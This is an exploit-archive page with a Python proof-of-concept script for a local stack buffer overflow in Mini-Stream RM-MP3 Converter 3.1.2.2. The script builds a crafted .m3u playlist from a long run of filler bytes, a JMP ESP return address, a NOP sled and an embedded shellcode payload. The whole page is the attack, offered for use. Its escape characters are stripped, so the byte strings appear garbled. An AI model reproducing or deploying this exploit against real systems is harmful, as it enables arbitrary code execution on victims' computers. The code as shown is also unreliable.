Home / exploits Mini-Stream RM-MP3 Converter 3.1.2.2 Buffer Overflow
Posted on 10 April 2012
# Exploit Title : Mini-stream RM-MP3 Converter� V 3.1.2.2 Local Buffer OverFlow # Author : [SkY-NeT SySteMs] # Software Link : [http://mini-stream.net/rm-to-mp3-converter/download/] # Version : [3.1.2.2] # Tested on : [Xp Sp 2] # Category : Local # Code : Python # Email : [skynet-systems@hotmail.il.co] # WebSite : [http://sskynetsystems.blogspot.com/] # !/usr/bin/python import os,sys header= "http://." junk= "x41" * 17416 # [A] ESP = "x13x44x87x7C" # 7C874413 FFE4 JMP ESP NOPS = "x90" * 16 ShellCode =( "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" "x0exa8x6ex77xcex83xeexfcxe2xf4x54x86xfexce" "xa8x6ex17x47x4dx5fxa5xaax23x3cx47x45xfax62" "xfcx9cxbcxe5x05xe6xa7xd9x3dxe8x99x91x46x0e" "x04x52x16xb2xaax42x57x0fx67x63x76x09x4ax9e" "x25x99x23x3cx67x45xeax52x76x1ex23x2ex0fx4b" "x68x1ax3dxcfx78x3exfcx86xb0xe5x2fxeexa9xbd" "x94xf2xe1xe5x43x45xa9xb8x46x31x99xaexdbx0f" "x67x63x76x09x90x8ex02x3axabx13x8fxf5xd5x4a" "x02x2cxf0xe5x2fxeaxa9xbdx11x45xa4x25xfcx96" "xb4x6fxa4x45xacxe5x76x1ex21x2ax53xeaxf3x35" "x16x97xf2x3fx88x2exf0x31x2dx45xbax85xf1x93" "xc2x6fxfax4bx11x6ex77xcexf8x06x46x45xc7xe9" "x88x1bx13x9exc2x6cxfex06xd1x5bx15xf3x88x1b" "x94x68x0bxc4x28x95x97xbbxadxd5x30xddxdax01" "x1dxcexfbx91xa2xadxc9x02x14xe0xcdx16x12xce") file = open("test.m3u","w") file.write(header+junk+ESP+NOPS+ShellCode) file.close()
